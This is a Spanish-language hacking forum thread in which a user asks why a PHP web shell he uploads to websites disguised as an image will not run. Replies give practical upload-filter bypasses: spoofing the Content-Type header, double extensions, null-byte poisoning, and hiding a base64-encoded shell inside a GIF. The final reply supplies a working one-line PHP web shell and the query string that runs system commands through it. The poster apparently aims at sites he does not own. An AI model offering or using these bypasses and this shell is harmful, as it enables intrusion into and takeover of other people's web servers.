Problema para subir shell

Iniciado por ricky19_77, Mayo 16, 2015, 01:09:20 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 16, 2015, 01:09:20 AM Ultima modificación: Mayo 16, 2015, 09:56:47 AM por Expermicid
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo

Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg. Si no se puede intenta bypassear el uploader de otra manera, juega con las extensiones asi file.jpeg.php o file.php.jpeg para q veas como funciona el uploader, puedes intentar tambien un null byte poissoning..

saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
In my mind where before there was order, today there is only chaØs!

Haz como dijo storm, si no, recuerda que no todos los uploaders se pueden bypassear.

Saludos.



en realidad no lo probe en un solo uploader por eso decia si estoy haciendo algo mal tambien meti la shell dentro del codigo fuente de un gif y tampoco me dejo es que veo muchos tutoriales y lo unico que hacen es subir la shell y despues le cambian la extension y listo se ejecuta

Mayo 16, 2015, 06:02:34 PM #4 Ultima modificación: Mayo 17, 2015, 09:49:14 PM por EPSILON
Proba con un gif que no pese mucho, ami me paso de no poder subir por la imagen y cuando la cambie me dejo, agregale el ; al final y metele la shell en base64 con el
Código: php
<? base64_decode(); ?>
obvio , y cuando lo subas editale la cabecera y donde dice Content-Type: le pones image/gif (Recuerda que no todos los uploads son vulnerables!)). Saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg.
es lo mismo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo

no todos los uploaders te dejan subir shell
proba con uno que sepas que es vulnerable, lo mas facil es hacerlo en localhost. podes usar este No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
no se que shell estas usando pero capaz no pasa porque es muy pesada. podes usar <?PHP $_GET['a']($_GET['b']);?> y para ejecutar comandos haces ?a=passthru&b=ls
que error te da?